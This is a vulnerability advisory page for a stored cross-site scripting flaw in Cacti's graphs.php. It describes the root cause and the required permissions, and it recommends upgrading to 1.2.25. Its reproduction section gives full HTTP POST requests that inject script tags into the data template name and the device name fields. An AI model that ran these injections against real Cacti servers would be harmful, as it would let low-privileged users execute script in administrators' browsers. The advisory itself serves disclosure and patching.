Stored Cross-site Scripting on graphs.php data template formated name view in Cacti
Description
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability which allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time. The script under graphs.php displays graph details such as data-source paths, data template information and graph related fields. _CENSUS_ found that an adversary that is able to configure either a data-source template with malicious code appended in the data-source name or a device with a malicious payload injected in the device name, may deploy a stored XSS attack against any user with _General Administration>Graphs_ privileges. A user that possesses the _Template Editor>Data Templates_ permissions can configure the data-source name in _cacti_. Please note that this may be a _low privileged_ user. This configuration occurs through http:///cacti/data_templates.php by editing an existing or adding a new data template. If a template is linked to a graph then the formatted template name will be rendered in the graph's management page. A user that possesses the _General Administration>Sites/Devices/Data_ permissions can configure the device name in _cacti_. This vulnerability has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to upgrade should add manual HTML escaping.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
13<1.2.25+ 1 more
- (no CPE)range: <1.2.25
- (no CPE)range: < 1.2.25
- osv-coords11 versionspkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5
< 1.2.25-bp155.2.3.1+ 10 more
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-2.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
Patches
Vulnerability mechanics
Root cause
"The application fails to properly sanitize user-supplied input in data source names and device names before rendering it in the graphs page."
Attack vector
An authenticated user with 'Template Editor>Data Templates' permissions can inject malicious JavaScript into a data source name via `data_templates.php`. Alternatively, a user with 'General Administration>Sites/Devices/Data' permissions can inject JavaScript into a device name via `host.php` [ref_id=1]. When a user with 'General Administration>Graphs' privileges views the graph management page (`graphs.php`), the injected script is executed in their browser [ref_id=1].
Affected code
The vulnerability lies in the `graphs.php` script, specifically around line 1543, where the variable `$name` is printed without prior HTML escaping. This variable can contain user-controlled data from either data source names or device names [ref_id=1].
What the fix does
The advisory recommends addressing this vulnerability by manually adding HTML escaping to user-supplied information before it is rendered. This prevents malicious code from being interpreted as executable JavaScript by the victim's browser. Users are advised to upgrade to version 1.2.25 or later, or apply manual HTML escaping if an upgrade is not immediately possible.
Preconditions
- authAttacker requires 'Template Editor>Data Templates' or 'General Administration>Sites/Devices/Data' permissions.
- authVictim requires 'General Administration>Graphs' privileges.
Reproduction
POST /cacti/data_templates.php?header=false HTTP/1.1 Host: <HOST> Content-Length: 528 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://<HOST> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close
__csrf_magic=<TOKEN>&template_name=Apache+HTTP++-+CPU+Load&data_template_id=3&data_template_data_id=3¤t_rrd=0&save_component_template=1&name=%7Chost_description%7C+-+Apache+HTTP++-+CPU+Load+%3Cscript%3Ealert('from+data+templates+data+source+name')%3C%2Fscript%3E&data_input_id=15&data_source_profile_id=1&rrd_step=300&active=on&data_source_name=apache_cpuload&rrd_minimum=0&rrd_maximum=100&data_source_type_id=1&rrd_heartbeat=600&data_input_field_id=52&data_template_rrd_id=3&value_hostname=&action=save
POST /cacti/host.php?header=false HTTP/1.1 Host: <HOST> Content-Length: 739 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://harry Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close
__csrf_magic=<TOKEN>&description=%3Cscript%3Ealert('malicious+code+in+device+name')%3C%2Fscript%3E&hostname=localhost&location=&poller_id=1&site_id=1&host_template_id=1&device_threads=1&snmp_version=2&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1¬es=&external_id=&id=4&save_component_host=1&graph_template_id=26&snmp_query_id=5&reindex_method=1&action=save
GET /cacti/graphs.php?action=graph_edit&id=6&debug=1 HTTP/1.1 Host: <HOST> Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/Cacti/cacti/security/advisories/GHSA-6hrc-2cfc-8hm7mitrex_refsource_CONFIRM
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/mitre
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/mitre
- www.debian.org/security/2023/dsa-5550mitre
News mentions
0No linked articles in our index yet.